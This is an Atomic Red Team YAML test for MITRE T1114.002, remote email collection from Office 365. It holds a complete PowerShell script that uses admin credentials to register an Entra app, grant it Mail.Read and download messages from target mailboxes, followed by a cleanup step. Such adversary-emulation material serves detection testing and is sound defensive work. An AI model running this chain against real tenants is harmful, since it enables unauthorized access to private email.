Atomic Red Team GUID generator
82 lines
4.6 KiB
YAML
82 lines
4.6 KiB
YAML
attack_technique: T1114.002
|
|
display_name: 'Email Collection: Remote Email Collection'
|
|
atomic_tests:
|
|
- name: Office365 - Remote Mail Collected
|
|
auto_generated_guid: 36657d95-d9d6-4fbf-8a31-f4085607bafd
|
|
description: |
|
|
Create and register an entra application that downloads emails from a tenant's Office 365 mailboxes using the Microsoft Graph API app-only access. This can be used by an adversary to collect an organization's sensitive information.
|
|
supported_platforms:
|
|
- office-365
|
|
input_arguments:
|
|
username:
|
|
description: Full username (including @domain) of Entra user w/ AppRoleassignment.ReadWrite.All and Application.ReadWrite.All Scope (eg, Global Administrator Role) and sign-in method is password
|
|
type: string
|
|
default:
|
|
password:
|
|
description: Entra user password
|
|
type: string
|
|
default:
|
|
1st_target_mailbox:
|
|
description: office-365 target_email_address
|
|
type: string
|
|
default:
|
|
2nd_target_mailbox:
|
|
description: office-365 target_email_address
|
|
type: string
|
|
default:
|
|
3rd_target_mailbox:
|
|
description: office-365 target_email_address
|
|
type: string
|
|
default:
|
|
dependency_executor_name: powershell
|
|
dependencies:
|
|
- description: |
|
|
Microsoft Graph PowerShell SDK must be installed.
|
|
prereq_command: |
|
|
$RequiredModule = Get-InstalledModule Microsoft.Graph
|
|
if (-not $RequiredModule) {exit 1} else {exit 0}
|
|
get_prereq_command: |
|
|
Install-Module Microsoft.Graph -Scope CurrentUser
|
|
- description: |
|
|
Az.Accounts module must be installed.
|
|
prereq_command: |
|
|
$RequiredModule2 = Get-InstalledModule Az.Accounts
|
|
if (-not $RequiredModule2) {exit 1} else {exit 0}
|
|
get_prereq_command: |
|
|
Install-Module Az.Accounts -Scope CurrentUser
|
|
executor:
|
|
command: |
|
|
$ss = ConvertTo-SecureString "#{password}" -AsPlainText -Force
|
|
$cred = New-Object PSCredential -ArgumentList '#{username}', $ss
|
|
$param = @{
|
|
Credential = $cred
|
|
Force = $true
|
|
}
|
|
$null = Connect-AzAccount @param
|
|
$token = (Get-AzAccessToken -ResourceTypeName MSGraph -ErrorAction Stop).token
|
|
$cert = New-SelfSignedCertificate -Subject "CN=PowerShell Application" -CertStoreLocation "Cert:\CurrentUser\My" -KeyExportPolicy Exportable -KeySpec Signature -KeyLength 2048 -KeyAlgorithm RSA -HashAlgorithm SHA256
|
|
$reqResourceAccess = ( @{ "resourceAccess" = (@{"id"= "570282fd-fa5c-430d-a7fd-fc8dc98a9dca"; "type"= "Scope"}, @{ "id"= "7427e0e9-2fba-42fe-b0c0-848c9e6a8182"; "type"= "Scope"}, @{"id"= "37f7f235-527c-4136-accd-4a02d197296e"; "type"= "Scope"}, @{"id"= "14dad69e-099b-42c9-810b-d002981feec1"; "type"= "Scope"}, @{ "id"= "e1fe6dd8-ba31-4d61-89e7-88639da4683d"; "type"= "Scope"}, @{ "id"= "810c84a8-4a9e-49e6-bf7d-12d183f40d01"; "type"= "Role"}); "resourceAppId" = "00000003-0000-0000-c000-000000000000" })
|
|
connect-mggraph -AccessToken $token
|
|
$context = Get-MgContext
|
|
$users = get-MgUser
|
|
$app = New-MgApplication -DisplayName "T1114.002 Atomic Test #1 - Office365 - Remote Email Collection" -RequiredResourceAccess $reqResourceAccess -Web @{ RedirectUris="http://localhost"; } -KeyCredentials @(@{ Type="AsymmetricX509Cert"; Usage="Verify"; Key=$cert.RawData })
|
|
New-MgServicePrincipal -AppId $app.appId -AdditionalProperties @{} | Out-Null
|
|
$resourceSPN = Get-MgServicePrincipal -Filter "AppId eq '$($app.AppId)'"
|
|
$graphApiApp = Get-MgServicePrincipal -Filter "DisplayName eq 'Microsoft Graph'"
|
|
$mailRole = $graphApiApp.AppRoles|Where-Object Value -Eq "Mail.Read"
|
|
New-MgServicePrincipalAppRoleAssignment -ServicePrincipalId $resourceSPN.Id -PrincipalId $resourceSPN.Id -ResourceId $graphApiApp.id -AppRoleId $mailRole.Id
|
|
$mailbox1 = "#{1st_target_mailbox}"
|
|
$mailbox2 = "#{2nd_target_mailbox}"
|
|
$mailbox3 = "#{3rd_target_mailbox}"
|
|
[System.Collections.ArrayList]$selectUsers = @()
|
|
foreach ($user in $users) {if (($user.Mail -eq $mailbox1) -Or ($user.Mail -eq $mailbox2) -Or ($user.Mail -eq $mailbox3)){$selectUsers.Add($user.id)}}
|
|
connect-mggraph -ClientId $app.AppId -TenantId $context.TenantId -CertificateName $cert.Subjectname.Name
|
|
foreach ($user in $selectUsers) { $url= "https://graph.microsoft.com/v1.0/users/$($user)/messages" ; Invoke-MgGraphRequest -Uri $url -Method GET -OutputType PSObject}
|
|
cleanup_command: |
|
|
connect-mggraph -Scopes AppRoleAssignment.ReadWrite.All,Application.ReadWrite.All,User.Read -NoWelcome
|
|
Remove-MgApplication $app.AppId
|
|
Remove-Item -Path Cert:\CurrentUser\My\$($cert.thumbprint) -DeleteKey
|
|
Disconnect-MgGraph
|
|
name: powershell
|
|
elevation_required: false
|